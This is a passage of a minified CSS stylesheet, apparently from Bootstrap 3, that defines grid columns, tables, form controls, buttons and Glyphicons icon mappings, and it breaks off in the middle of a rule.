code{padding:0;font-size:inherit;color:inherit;white-space:pre-wrap;background-color:transparent;border:0}.pre-scrollable{max-height:340px;overflow-y:scroll}.container{padding-right:15px;padding-left:15px;margin-right:auto;margin-left:auto}.container:before,.container:after{display:table;content:" "}.container:after{clear:both}.container:before,.container:after{display:table;content:" "}.container:after{clear:both}.row{margin-right:-15px;margin-left:-15px}.row:before,.row:after{display:table;content:" "}.row:after{clear:both}.row:before,.row:after{display:table;content:" "}.row:after{clear:both}.col-xs-1,.col-xs-2,.col-xs-3,.col-xs-4,.col-xs-5,.col-xs-6,.col-xs-7,.col-xs-8,.col-xs-9,.col-xs-10,.col-xs-11,.col-xs-12,.col-sm-1,.col-sm-2,.col-sm-3,.col-sm-4,.col-sm-5,.col-sm-6,.col-sm-7,.col-sm-8,.col-sm-9,.col-sm-10,.col-sm-11,.col-sm-12,.col-md-1,.col-md-2,.col-md-3,.col-md-4,.col-md-5,.col-md-6,.col-md-7,.col-md-8,.col-md-9,.col-md-10,.col-md-11,.col-md-12,.col-lg-1,.col-lg-2,.col-lg-3,.col-lg-4,.col-lg-5,.col-lg-6,.col-lg-7,.col-lg-8,.col-lg-9,.col-lg-10,.col-lg-11,.col-lg-12{position:relative;min-height:1px;padding-right:15px;padding-left:15px}.col-xs-1,.col-xs-2,.col-xs-3,.col-xs-4,.col-xs-5,.col-xs-6,.col-xs-7,.col-xs-8,.col-xs-9,.col-xs-10,.col-xs-11{float:left}.col-xs-1{width:8.333333333333332%}.col-xs-2{width:16.666666666666664%}.col-xs-3{width:25%}.col-xs-4{width:33.33333333333333%}.col-xs-5{width:41.66666666666667%}.col-xs-6{width:50%}.col-xs-7{width:58.333333333333336%}.col-xs-8{width:66.66666666666666%}.col-xs-9{width:75%}.col-xs-10{width:83.33333333333334%}.col-xs-11{width:91.66666666666666%}.col-xs-12{width:100%}@media(min-width:768px){.container{max-width:750px}.col-sm-1,.col-sm-2,.col-sm-3,.col-sm-4,.col-sm-5,.col-sm-6,.col-sm-7,.col-sm-8,.col-sm-9,.col-sm-10,.col-sm-11{float:left}.col-sm-1{width:8.333333333333332%}.col-sm-2{width:16.666666666666664%}.col-sm-3{width:25%}.col-sm-4{width:33.33333333333333%}.col-sm-5{width:41.66666666666667%}.col-sm-6{width:50%}.col-sm-7{width:58.333333333333336%}.col-sm-8{width:66.66666666666666%}.col-sm-9{width:75%}.col-sm-10{width:83.33333333333334%}.col-sm-11{width:91.66666666666666%}.col-sm-12{width:100%}.col-sm-push-1{left:8.333333333333332%}.col-sm-push-2{left:16.666666666666664%}.col-sm-push-3{left:25%}.col-sm-push-4{left:33.33333333333333%}.col-sm-push-5{left:41.66666666666667%}.col-sm-push-6{left:50%}.col-sm-push-7{left:58.333333333333336%}.col-sm-push-8{left:66.66666666666666%}.col-sm-push-9{left:75%}.col-sm-push-10{left:83.33333333333334%}.col-sm-push-11{left:91.66666666666666%}.col-sm-pull-1{right:8.333333333333332%}.col-sm-pull-2{right:16.666666666666664%}.col-sm-pull-3{right:25%}.col-sm-pull-4{right:33.33333333333333%}.col-sm-pull-5{right:41.66666666666667%}.col-sm-pull-6{right:50%}.col-sm-pull-7{right:58.333333333333336%}.col-sm-pull-8{right:66.66666666666666%}.col-sm-pull-9{right:75%}.col-sm-pull-10{right:83.33333333333334%}.col-sm-pull-11{right:91.66666666666666%}.col-sm-offset-1{margin-left:8.333333333333332%}.col-sm-offset-2{margin-left:16.666666666666664%}.col-sm-offset-3{margin-left:25%}.col-sm-offset-4{margin-left:33.33333333333333%}.col-sm-offset-5{margin-left:41.66666666666667%}.col-sm-offset-6{margin-left:50%}.col-sm-offset-7{margin-left:58.333333333333336%}.col-sm-offset-8{margin-left:66.66666666666666%}.col-sm-offset-9{margin-left:75%}.col-sm-offset-10{margin-left:83.33333333333334%}.col-sm-offset-11{margin-left:91.66666666666666%}}@media(min-width:992px){.container{max-width:970px}.col-md-1,.col-md-2,.col-md-3,.col-md-4,.col-md-5,.col-md-6,.col-md-7,.col-md-8,.col-md-9,.col-md-10,.col-md-11{float:left}.col-md-1{width:8.333333333333332%}.col-md-2{width:16.666666666666664%}.col-md-3{width:25%}.col-md-4{width:33.33333333333333%}.col-md-5{width:41.66666666666667%}.col-md-6{width:50%}.col-md-7{width:58.333333333333336%}.col-md-8{width:66.66666666666666%}.col-md-9{width:75%}.col-md-10{width:83.33333333333334%}.col-md-11{width:91.66666666666666%}.col-md-12{width:100%}.col-md-push-0{left:auto}.col-md-push-1{left:8.333333333333332%}.col-md-push-2{left:16.666666666666664%}.col-md-push-3{left:25%}.col-md-push-4{left:33.33333333333333%}.col-md-push-5{left:41.66666666666667%}.col-md-push-6{left:50%}.col-md-push-7{left:58.333333333333336%}.col-md-push-8{left:66.66666666666666%}.col-md-push-9{left:75%}.col-md-push-10{left:83.33333333333334%}.col-md-push-11{left:91.66666666666666%}.col-md-pull-0{right:auto}.col-md-pull-1{right:8.333333333333332%}.col-md-pull-2{right:16.666666666666664%}.col-md-pull-3{right:25%}.col-md-pull-4{right:33.33333333333333%}.col-md-pull-5{right:41.66666666666667%}.col-md-pull-6{right:50%}.col-md-pull-7{right:58.333333333333336%}.col-md-pull-8{right:66.66666666666666%}.col-md-pull-9{right:75%}.col-md-pull-10{right:83.33333333333334%}.col-md-pull-11{right:91.66666666666666%}.col-md-offset-0{margin-left:0}.col-md-offset-1{margin-left:8.333333333333332%}.col-md-offset-2{margin-left:16.666666666666664%}.col-md-offset-3{margin-left:25%}.col-md-offset-4{margin-left:33.33333333333333%}.col-md-offset-5{margin-left:41.66666666666667%}.col-md-offset-6{margin-left:50%}.col-md-offset-7{margin-left:58.333333333333336%}.col-md-offset-8{margin-left:66.66666666666666%}.col-md-offset-9{margin-left:75%}.col-md-offset-10{margin-left:83.33333333333334%}.col-md-offset-11{margin-left:91.66666666666666%}}@media(min-width:1200px){.container{max-width:1170px}.col-lg-1,.col-lg-2,.col-lg-3,.col-lg-4,.col-lg-5,.col-lg-6,.col-lg-7,.col-lg-8,.col-lg-9,.col-lg-10,.col-lg-11{float:left}.col-lg-1{width:8.333333333333332%}.col-lg-2{width:16.666666666666664%}.col-lg-3{width:25%}.col-lg-4{width:33.33333333333333%}.col-lg-5{width:41.66666666666667%}.col-lg-6{width:50%}.col-lg-7{width:58.333333333333336%}.col-lg-8{width:66.66666666666666%}.col-lg-9{width:75%}.col-lg-10{width:83.33333333333334%}.col-lg-11{width:91.66666666666666%}.col-lg-12{width:100%}.col-lg-push-0{left:auto}.col-lg-push-1{left:8.333333333333332%}.col-lg-push-2{left:16.666666666666664%}.col-lg-push-3{left:25%}.col-lg-push-4{left:33.33333333333333%}.col-lg-push-5{left:41.66666666666667%}.col-lg-push-6{left:50%}.col-lg-push-7{left:58.333333333333336%}.col-lg-push-8{left:66.66666666666666%}.col-lg-push-9{left:75%}.col-lg-push-10{left:83.33333333333334%}.col-lg-push-11{left:91.66666666666666%}.col-lg-pull-0{right:auto}.col-lg-pull-1{right:8.333333333333332%}.col-lg-pull-2{right:16.666666666666664%}.col-lg-pull-3{right:25%}.col-lg-pull-4{right:33.33333333333333%}.col-lg-pull-5{right:41.66666666666667%}.col-lg-pull-6{right:50%}.col-lg-pull-7{right:58.333333333333336%}.col-lg-pull-8{right:66.66666666666666%}.col-lg-pull-9{right:75%}.col-lg-pull-10{right:83.33333333333334%}.col-lg-pull-11{right:91.66666666666666%}.col-lg-offset-0{margin-left:0}.col-lg-offset-1{margin-left:8.333333333333332%}.col-lg-offset-2{margin-left:16.666666666666664%}.col-lg-offset-3{margin-left:25%}.col-lg-offset-4{margin-left:33.33333333333333%}.col-lg-offset-5{margin-left:41.66666666666667%}.col-lg-offset-6{margin-left:50%}.col-lg-offset-7{margin-left:58.333333333333336%}.col-lg-offset-8{margin-left:66.66666666666666%}.col-lg-offset-9{margin-left:75%}.col-lg-offset-10{margin-left:83.33333333333334%}.col-lg-offset-11{margin-left:91.66666666666666%}}table{max-width:100%;background-color:transparent}th{text-align:left}.table{width:100%;margin-bottom:20px}.table thead>tr>th,.table tbody>tr>th,.table tfoot>tr>th,.table thead>tr>td,.table tbody>tr>td,.table tfoot>tr>td{padding:8px;line-height:1.428571429;vertical-align:top;border-top:1px solid #ddd}.table thead>tr>th{vertical-align:bottom;border-bottom:2px solid #ddd}.table caption+thead tr:first-child th,.table colgroup+thead tr:first-child th,.table thead:first-child tr:first-child th,.table caption+thead tr:first-child td,.table colgroup+thead tr:first-child td,.table thead:first-child tr:first-child td{border-top:0}.table tbody+tbody{border-top:2px solid #ddd}.table .table{background-color:#fff}.table-condensed thead>tr>th,.table-condensed tbody>tr>th,.table-condensed tfoot>tr>th,.table-condensed thead>tr>td,.table-condensed tbody>tr>td,.table-condensed tfoot>tr>td{padding:5px}.table-bordered{border:1px solid #ddd}.table-bordered>thead>tr>th,.table-bordered>tbody>tr>th,.table-bordered>tfoot>tr>th,.table-bordered>thead>tr>td,.table-bordered>tbody>tr>td,.table-bordered>tfoot>tr>td{border:1px solid #ddd}.table-bordered>thead>tr>th,.table-bordered>thead>tr>td{border-bottom-width:2px}.table-striped>tbody>tr:nth-child(odd)>td,.table-striped>tbody>tr:nth-child(odd)>th{background-color:#f9f9f9}.table-hover>tbody>tr:hover>td,.table-hover>tbody>tr:hover>th{background-color:#f5f5f5}table col[class*="col-"]{display:table-column;float:none}table td[class*="col-"],table th[class*="col-"]{display:table-cell;float:none}.table>thead>tr>td.active,.table>tbody>tr>td.active,.table>tfoot>tr>td.active,.table>thead>tr>th.active,.table>tbody>tr>th.active,.table>tfoot>tr>th.active,.table>thead>tr.active>td,.table>tbody>tr.active>td,.table>tfoot>tr.active>td,.table>thead>tr.active>th,.table>tbody>tr.active>th,.table>tfoot>tr.active>th{background-color:#f5f5f5}.table>thead>tr>td.success,.table>tbody>tr>td.success,.table>tfoot>tr>td.success,.table>thead>tr>th.success,.table>tbody>tr>th.success,.table>tfoot>tr>th.success,.table>thead>tr.success>td,.table>tbody>tr.success>td,.table>tfoot>tr.success>td,.table>thead>tr.success>th,.table>tbody>tr.success>th,.table>tfoot>tr.success>th{background-color:#dff0d8;border-color:#d6e9c6}.table-hover>tbody>tr>td.success:hover,.table-hover>tbody>tr>th.success:hover,.table-hover>tbody>tr.success:hover>td{background-color:#d0e9c6;border-color:#c9e2b3}.table>thead>tr>td.danger,.table>tbody>tr>td.danger,.table>tfoot>tr>td.danger,.table>thead>tr>th.danger,.table>tbody>tr>th.danger,.table>tfoot>tr>th.danger,.table>thead>tr.danger>td,.table>tbody>tr.danger>td,.table>tfoot>tr.danger>td,.table>thead>tr.danger>th,.table>tbody>tr.danger>th,.table>tfoot>tr.danger>th{background-color:#f2dede;border-color:#eed3d7}.table-hover>tbody>tr>td.danger:hover,.table-hover>tbody>tr>th.danger:hover,.table-hover>tbody>tr.danger:hover>td{background-color:#ebcccc;border-color:#e6c1c7}.table>thead>tr>td.warning,.table>tbody>tr>td.warning,.table>tfoot>tr>td.warning,.table>thead>tr>th.warning,.table>tbody>tr>th.warning,.table>tfoot>tr>th.warning,.table>thead>tr.warning>td,.table>tbody>tr.warning>td,.table>tfoot>tr.warning>td,.table>thead>tr.warning>th,.table>tbody>tr.warning>th,.table>tfoot>tr.warning>th{background-color:#fcf8e3;border-color:#fbeed5}.table-hover>tbody>tr>td.warning:hover,.table-hover>tbody>tr>th.warning:hover,.table-hover>tbody>tr.warning:hover>td{background-color:#faf2cc;border-color:#f8e5be}@media(max-width:768px){.table-responsive{width:100%;margin-bottom:15px;overflow-x:scroll;overflow-y:hidden;border:1px solid #ddd}.table-responsive>.table{margin-bottom:0;background-color:#fff}.table-responsive>.table>thead>tr>th,.table-responsive>.table>tbody>tr>th,.table-responsive>.table>tfoot>tr>th,.table-responsive>.table>thead>tr>td,.table-responsive>.table>tbody>tr>td,.table-responsive>.table>tfoot>tr>td{white-space:nowrap}.table-responsive>.table-bordered{border:0}.table-responsive>.table-bordered>thead>tr>th:first-child,.table-responsive>.table-bordered>tbody>tr>th:first-child,.table-responsive>.table-bordered>tfoot>tr>th:first-child,.table-responsive>.table-bordered>thead>tr>td:first-child,.table-responsive>.table-bordered>tbody>tr>td:first-child,.table-responsive>.table-bordered>tfoot>tr>td:first-child{border-left:0}.table-responsive>.table-bordered>thead>tr>th:last-child,.table-responsive>.table-bordered>tbody>tr>th:last-child,.table-responsive>.table-bordered>tfoot>tr>th:last-child,.table-responsive>.table-bordered>thead>tr>td:last-child,.table-responsive>.table-bordered>tbody>tr>td:last-child,.table-responsive>.table-bordered>tfoot>tr>td:last-child{border-right:0}.table-responsive>.table-bordered>thead>tr:last-child>th,.table-responsive>.table-bordered>tbody>tr:last-child>th,.table-responsive>.table-bordered>tfoot>tr:last-child>th,.table-responsive>.table-bordered>thead>tr:last-child>td,.table-responsive>.table-bordered>tbody>tr:last-child>td,.table-responsive>.table-bordered>tfoot>tr:last-child>td{border-bottom:0}}fieldset{padding:0;margin:0;border:0}legend{display:block;width:100%;padding:0;margin-bottom:20px;font-size:21px;line-height:inherit;color:#333;border:0;border-bottom:1px solid #e5e5e5}label{display:inline-block;margin-bottom:5px;font-weight:bold}input[type="search"]{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}input[type="radio"],input[type="checkbox"]{margin:4px 0 0;margin-top:1px \9;line-height:normal}input[type="file"]{display:block}select[multiple],select[size]{height:auto}select optgroup{font-family:inherit;font-size:inherit;font-style:inherit}input[type="file"]:focus,input[type="radio"]:focus,input[type="checkbox"]:focus{outline:thin dotted #333;outline:5px auto -webkit-focus-ring-color;outline-offset:-2px}input[type="number"]::-webkit-outer-spin-button,input[type="number"]::-webkit-inner-spin-button{height:auto}.form-control:-moz-placeholder{color:#999}.form-control::-moz-placeholder{color:#999}.form-control:-ms-input-placeholder{color:#999}.form-control::-webkit-input-placeholder{color:#999}.form-control{display:block;width:100%;height:34px;padding:6px 12px;font-size:14px;line-height:1.428571429;color:#555;vertical-align:middle;background-color:#fff;border:1px solid #ccc;border-radius:4px;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,0.075);box-shadow:inset 0 1px 1px rgba(0,0,0,0.075);-webkit-transition:border-color ease-in-out .15s,box-shadow ease-in-out .15s;transition:border-color ease-in-out .15s,box-shadow ease-in-out .15s}.form-control:focus{border-color:#66afe9;outline:0;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,0.075),0 0 8px rgba(102,175,233,0.6);box-shadow:inset 0 1px 1px rgba(0,0,0,0.075),0 0 8px rgba(102,175,233,0.6)}.form-control[disabled],.form-control[readonly],fieldset[disabled] .form-control{cursor:not-allowed;background-color:#eee}textarea.form-control{height:auto}.form-group{margin-bottom:15px}.radio,.checkbox{display:block;min-height:20px;padding-left:20px;margin-top:10px;margin-bottom:10px;vertical-align:middle}.radio label,.checkbox label{display:inline;margin-bottom:0;font-weight:normal;cursor:pointer}.radio input[type="radio"],.radio-inline input[type="radio"],.checkbox input[type="checkbox"],.checkbox-inline input[type="checkbox"]{float:left;margin-left:-20px}.radio+.radio,.checkbox+.checkbox{margin-top:-5px}.radio-inline,.checkbox-inline{display:inline-block;padding-left:20px;margin-bottom:0;font-weight:normal;vertical-align:middle;cursor:pointer}.radio-inline+.radio-inline,.checkbox-inline+.checkbox-inline{margin-top:0;margin-left:10px}input[type="radio"][disabled],input[type="checkbox"][disabled],.radio[disabled],.radio-inline[disabled],.checkbox[disabled],.checkbox-inline[disabled],fieldset[disabled] input[type="radio"],fieldset[disabled] input[type="checkbox"],fieldset[disabled] .radio,fieldset[disabled] .radio-inline,fieldset[disabled] .checkbox,fieldset[disabled] .checkbox-inline{cursor:not-allowed}.input-sm{height:30px;padding:5px 10px;font-size:12px;line-height:1.5;border-radius:3px}select.input-sm{height:30px;line-height:30px}textarea.input-sm{height:auto}.input-lg{height:45px;padding:10px 16px;font-size:18px;line-height:1.33;border-radius:6px}select.input-lg{height:45px;line-height:45px}textarea.input-lg{height:auto}.has-warning .help-block,.has-warning .control-label{color:#c09853}.has-warning .form-control{border-color:#c09853;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,0.075);box-shadow:inset 0 1px 1px rgba(0,0,0,0.075)}.has-warning .form-control:focus{border-color:#a47e3c;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,0.075),0 0 6px #dbc59e;box-shadow:inset 0 1px 1px rgba(0,0,0,0.075),0 0 6px #dbc59e}.has-warning .input-group-addon{color:#c09853;background-color:#fcf8e3;border-color:#c09853}.has-error .help-block,.has-error .control-label{color:#b94a48}.has-error .form-control{border-color:#b94a48;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,0.075);box-shadow:inset 0 1px 1px rgba(0,0,0,0.075)}.has-error .form-control:focus{border-color:#953b39;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,0.075),0 0 6px #d59392;box-shadow:inset 0 1px 1px rgba(0,0,0,0.075),0 0 6px #d59392}.has-error .input-group-addon{color:#b94a48;background-color:#f2dede;border-color:#b94a48}.has-success .help-block,.has-success .control-label{color:#468847}.has-success .form-control{border-color:#468847;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,0.075);box-shadow:inset 0 1px 1px rgba(0,0,0,0.075)}.has-success .form-control:focus{border-color:#356635;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,0.075),0 0 6px #7aba7b;box-shadow:inset 0 1px 1px rgba(0,0,0,0.075),0 0 6px #7aba7b}.has-success .input-group-addon{color:#468847;background-color:#dff0d8;border-color:#468847}.form-control-static{padding-top:7px;margin-bottom:0}.help-block{display:block;margin-top:5px;margin-bottom:10px;color:#737373}@media(min-width:768px){.form-inline .form-group{display:inline-block;margin-bottom:0;vertical-align:middle}.form-inline .form-control{display:inline-block}.form-inline .radio,.form-inline .checkbox{display:inline-block;padding-left:0;margin-top:0;margin-bottom:0}.form-inline .radio input[type="radio"],.form-inline .checkbox input[type="checkbox"]{float:none;margin-left:0}}.form-horizontal .control-label,.form-horizontal .radio,.form-horizontal .checkbox,.form-horizontal .radio-inline,.form-horizontal .checkbox-inline{padding-top:7px;margin-top:0;margin-bottom:0}.form-horizontal .form-group{margin-right:-15px;margin-left:-15px}.form-horizontal .form-group:before,.form-horizontal .form-group:after{display:table;content:" "}.form-horizontal .form-group:after{clear:both}.form-horizontal .form-group:before,.form-horizontal .form-group:after{display:table;content:" "}.form-horizontal .form-group:after{clear:both}@media(min-width:768px){.form-horizontal .control-label{text-align:right}}.btn{display:inline-block;padding:6px 12px;margin-bottom:0;font-size:14px;font-weight:normal;line-height:1.428571429;text-align:center;white-space:nowrap;vertical-align:middle;cursor:pointer;border:1px solid transparent;border-radius:4px;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none}.btn:focus{outline:thin dotted #333;outline:5px auto -webkit-focus-ring-color;outline-offset:-2px}.btn:hover,.btn:focus{color:#333;text-decoration:none}.btn:active,.btn.active{background-image:none;outline:0;-webkit-box-shadow:inset 0 3px 5px rgba(0,0,0,0.125);box-shadow:inset 0 3px 5px rgba(0,0,0,0.125)}.btn.disabled,.btn[disabled],fieldset[disabled] .btn{pointer-events:none;cursor:not-allowed;opacity:.65;filter:alpha(opacity=65);-webkit-box-shadow:none;box-shadow:none}.btn-default{color:#333;background-color:#fff;border-color:#ccc}.btn-default:hover,.btn-default:focus,.btn-default:active,.btn-default.active,.open .dropdown-toggle.btn-default{color:#333;background-color:#ebebeb;border-color:#adadad}.btn-default:active,.btn-default.active,.open .dropdown-toggle.btn-default{background-image:none}.btn-default.disabled,.btn-default[disabled],fieldset[disabled] .btn-default,.btn-default.disabled:hover,.btn-default[disabled]:hover,fieldset[disabled] .btn-default:hover,.btn-default.disabled:focus,.btn-default[disabled]:focus,fieldset[disabled] .btn-default:focus,.btn-default.disabled:active,.btn-default[disabled]:active,fieldset[disabled] .btn-default:active,.btn-default.disabled.active,.btn-default[disabled].active,fieldset[disabled] .btn-default.active{background-color:#fff;border-color:#ccc}.btn-primary{color:#fff;background-color:#428bca;border-color:#357ebd}.btn-primary:hover,.btn-primary:focus,.btn-primary:active,.btn-primary.active,.open .dropdown-toggle.btn-primary{color:#fff;background-color:#3276b1;border-color:#285e8e}.btn-primary:active,.btn-primary.active,.open .dropdown-toggle.btn-primary{background-image:none}.btn-primary.disabled,.btn-primary[disabled],fieldset[disabled] .btn-primary,.btn-primary.disabled:hover,.btn-primary[disabled]:hover,fieldset[disabled] .btn-primary:hover,.btn-primary.disabled:focus,.btn-primary[disabled]:focus,fieldset[disabled] .btn-primary:focus,.btn-primary.disabled:active,.btn-primary[disabled]:active,fieldset[disabled] .btn-primary:active,.btn-primary.disabled.active,.btn-primary[disabled].active,fieldset[disabled] .btn-primary.active{background-color:#428bca;border-color:#357ebd}.btn-warning{color:#fff;background-color:#f0ad4e;border-color:#eea236}.btn-warning:hover,.btn-warning:focus,.btn-warning:active,.btn-warning.active,.open .dropdown-toggle.btn-warning{color:#fff;background-color:#ed9c28;border-color:#d58512}.btn-warning:active,.btn-warning.active,.open .dropdown-toggle.btn-warning{background-image:none}.btn-warning.disabled,.btn-warning[disabled],fieldset[disabled] .btn-warning,.btn-warning.disabled:hover,.btn-warning[disabled]:hover,fieldset[disabled] .btn-warning:hover,.btn-warning.disabled:focus,.btn-warning[disabled]:focus,fieldset[disabled] .btn-warning:focus,.btn-warning.disabled:active,.btn-warning[disabled]:active,fieldset[disabled] .btn-warning:active,.btn-warning.disabled.active,.btn-warning[disabled].active,fieldset[disabled] .btn-warning.active{background-color:#f0ad4e;border-color:#eea236}.btn-danger{color:#fff;background-color:#d9534f;border-color:#d43f3a}.btn-danger:hover,.btn-danger:focus,.btn-danger:active,.btn-danger.active,.open .dropdown-toggle.btn-danger{color:#fff;background-color:#d2322d;border-color:#ac2925}.btn-danger:active,.btn-danger.active,.open .dropdown-toggle.btn-danger{background-image:none}.btn-danger.disabled,.btn-danger[disabled],fieldset[disabled] .btn-danger,.btn-danger.disabled:hover,.btn-danger[disabled]:hover,fieldset[disabled] .btn-danger:hover,.btn-danger.disabled:focus,.btn-danger[disabled]:focus,fieldset[disabled] .btn-danger:focus,.btn-danger.disabled:active,.btn-danger[disabled]:active,fieldset[disabled] .btn-danger:active,.btn-danger.disabled.active,.btn-danger[disabled].active,fieldset[disabled] .btn-danger.active{background-color:#d9534f;border-color:#d43f3a}.btn-success{color:#fff;background-color:#5cb85c;border-color:#4cae4c}.btn-success:hover,.btn-success:focus,.btn-success:active,.btn-success.active,.open .dropdown-toggle.btn-success{color:#fff;background-color:#47a447;border-color:#398439}.btn-success:active,.btn-success.active,.open .dropdown-toggle.btn-success{background-image:none}.btn-success.disabled,.btn-success[disabled],fieldset[disabled] .btn-success,.btn-success.disabled:hover,.btn-success[disabled]:hover,fieldset[disabled] .btn-success:hover,.btn-success.disabled:focus,.btn-success[disabled]:focus,fieldset[disabled] .btn-success:focus,.btn-success.disabled:active,.btn-success[disabled]:active,fieldset[disabled] .btn-success:active,.btn-success.disabled.active,.btn-success[disabled].active,fieldset[disabled] .btn-success.active{background-color:#5cb85c;border-color:#4cae4c}.btn-info{color:#fff;background-color:#5bc0de;border-color:#46b8da}.btn-info:hover,.btn-info:focus,.btn-info:active,.btn-info.active,.open .dropdown-toggle.btn-info{color:#fff;background-color:#39b3d7;border-color:#269abc}.btn-info:active,.btn-info.active,.open .dropdown-toggle.btn-info{background-image:none}.btn-info.disabled,.btn-info[disabled],fieldset[disabled] .btn-info,.btn-info.disabled:hover,.btn-info[disabled]:hover,fieldset[disabled] .btn-info:hover,.btn-info.disabled:focus,.btn-info[disabled]:focus,fieldset[disabled] .btn-info:focus,.btn-info.disabled:active,.btn-info[disabled]:active,fieldset[disabled] .btn-info:active,.btn-info.disabled.active,.btn-info[disabled].active,fieldset[disabled] .btn-info.active{background-color:#5bc0de;border-color:#46b8da}.btn-link{font-weight:normal;color:#428bca;cursor:pointer;border-radius:0}.btn-link,.btn-link:active,.btn-link[disabled],fieldset[disabled] .btn-link{background-color:transparent;-webkit-box-shadow:none;box-shadow:none}.btn-link,.btn-link:hover,.btn-link:focus,.btn-link:active{border-color:transparent}.btn-link:hover,.btn-link:focus{color:#2a6496;text-decoration:underline;background-color:transparent}.btn-link[disabled]:hover,fieldset[disabled] .btn-link:hover,.btn-link[disabled]:focus,fieldset[disabled] .btn-link:focus{color:#999;text-decoration:none}.btn-lg{padding:10px 16px;font-size:18px;line-height:1.33;border-radius:6px}.btn-sm,.btn-xs{padding:5px 10px;font-size:12px;line-height:1.5;border-radius:3px}.btn-xs{padding:1px 5px}.btn-block{display:block;width:100%;padding-right:0;padding-left:0}.btn-block+.btn-block{margin-top:5px}input[type="submit"].btn-block,input[type="reset"].btn-block,input[type="button"].btn-block{width:100%}.fade{opacity:0;-webkit-transition:opacity .15s linear;transition:opacity .15s linear}.fade.in{opacity:1}.collapse{display:none}.collapse.in{display:block}.collapsing{position:relative;height:0;overflow:hidden;-webkit-transition:height .35s ease;transition:height .35s ease}@font-face{font-family:'Glyphicons Halflings';src:url('../fonts/glyphicons-halflings-regular.eot');src:url('../fonts/glyphicons-halflings-regular.eot?#iefix') format('embedded-opentype'),url('../fonts/glyphicons-halflings-regular.woff') format('woff'),url('../fonts/glyphicons-halflings-regular.ttf') format('truetype'),url('../fonts/glyphicons-halflings-regular.svg#glyphicons-halflingsregular') format('svg')}.glyphicon{position:relative;top:1px;display:inline-block;font-family:'Glyphicons Halflings';-webkit-font-smoothing:antialiased;font-style:normal;font-weight:normal;line-height:1}.glyphicon-asterisk:before{content:"\2a"}.glyphicon-plus:before{content:"\2b"}.glyphicon-euro:before{content:"\20ac"}.glyphicon-minus:before{content:"\2212"}.glyphicon-cloud:before{content:"\2601"}.glyphicon-envelope:before{content:"\2709"}.glyphicon-pencil:before{content:"\270f"}.glyphicon-glass:before{content:"\e001"}.glyphicon-music:before{content:"\e002"}.glyphicon-search:before{content:"\e003"}.glyphicon-heart:before{content:"\e005"}.glyphicon-star:before{content:"\e006"}.glyphicon-star-empty:before{content:"\e007"}.glyphicon-user:before{content:"\e008"}.glyphicon-film:before{content:"\e009"}.glyphicon-th-large:before{content:"\e010"}.glyphicon-th:before{content:"\e011"}.glyphicon-th-list:before{content:"\e012"}.glyphicon-ok:before{content:"\e013"}.glyphicon-remove:before{content:"\e014"}.glyphicon-zoom-in:before{content:"\e015"}.glyphicon-zoom-out:before{content:"\e016"}.glyphicon-off:before{content:"\e017"}.glyphicon-signal:before{content:"\e018"}.glyphicon-cog:before{content:"\e019"}.glyphicon-trash:before{content:"\e020"}.glyphicon-home:before{content:"\e021"}.glyphicon-file:before{content:"\e022"}.glyphicon-time:before{content:"\e023"}.glyphicon-road:before{content:"\e024"}.glyphicon-download-alt:before{content:"\e025"}.glyphicon-download:before{content:"\e026"}.glyphicon-upload:before{content:"\e027"}.glyphicon-inbox:before{content:"\e028"}.glyphicon-play-circle:before{content:"\e029"}.glyphicon-repeat:before{content:"\e030"}.glyphicon-refresh:before{content:"\e031"}.glyphicon-list-alt:before{content:"\e032"}.glyphicon-flag:before{content:"\e034"}.glyphicon-headphones:before{content:"\e035"}.glyphicon-volume-off:before{content:"\e036"}.glyphicon-volume-down:before{content:"\e037"}.glyphicon-volume-up:before{content:"\e038"}.glyphicon-qrcode:before{content:"\e039"}.glyphicon-barcode:before{content:"\e040"}.glyphicon-tag:before{content:"\e041"}.glyphicon-tags:before{content:"\e042"}.glyphicon-book:before{content:"\e043"}.glyphicon-print:before{content:"\e045"}.glyphicon-font:before{content:"\e047"}.glyphicon-bold:before{content:"\e048"}.glyphicon-italic:before{content:"\e049"}.glyphicon-text-height:before{content:"\e050"}.glyphicon-text-width:before{content:"\e051"}.glyphicon-align-left:before{content:"\e052"}.glyphicon-align-center:before{content:"\e053"}.glyphicon-align-right:before{content:"\e054"}.glyphicon-align-justify:before{content:"\e055"}.glyphicon-list:before{content:"\e056"}.glyphicon-indent-left:before{content:"\e057"}.glyphicon-indent-right:before{content:"\e058"}.glyphicon-facetime-video:before{content:"\e059"}.glyphicon-picture:before{content:"\e060"}.glyphicon-map-marker:before{content:"\e062"}.glyphicon-adjust:before{content:"\e063"}.glyphicon-tint:before{content:"\e064"}.glyphicon-edit:before{content:"\e065"}.glyphicon-share:before{content:"\e066"}.glyphicon-check:before{content:"\e067"}.glyphicon-move:before{content:"\e068"}.glyphicon-step-backward:before{content:"\e069"}.glyphicon-fast-backward:before{content:"\e070"}.glyphicon-backward:before{content:"\e071"}.glyphicon-play:before{content:"\e072"}.glyphicon-pause:before{content:"\e073"}.glyphicon-stop:before{content:"\e074"}.glyphicon-forward:before{content:"\e075"}.glyphicon-fast-forward:before{content:"\e076"}.glyphicon-step-forward:before{content:"\e077"}.glyphicon-eject:before{content:"\e078"}.glyphicon-chevron-left:before{content:"\e079"}.glyphicon-chevron-right:before{content:"\e080"}.glyphicon-plus-sign:before{content:"\e081"}.glyphicon-minus-sign:before{content:"\e082"}.glyphicon-remove-sign:before{content:"\e083"}.glyphicon-ok-sign:before{content:"\e084"}.glyphicon-question-sign:before{content:"\e085"}.glyphicon-info-sign:before{content:"\e086"}.glyphicon-screenshot:before{content:"\e087"}.glyphicon-remove-circle:before{content:"\e088"}.glyphicon-ok-circle:before{content:"\e089"}.glyphicon-ban-circle:before{content:"\e090"}.glyphicon-arrow-left:before{content:"\e091"}.glyphicon-arrow-right:before{content:"\e092"}.glyphicon-arrow-up:before{content:"\e093"}.glyphicon-arrow-down:before{content:"\e094"}.glyphicon-share-alt:before{content:"\e095"}.glyphicon-resize-full:before{content:"\e096"}.glyphicon-resize-small:before{content:"\e097"}.glyphicon-exclamation-sign:before{content:"\e101"}.glyphicon-gift:before{co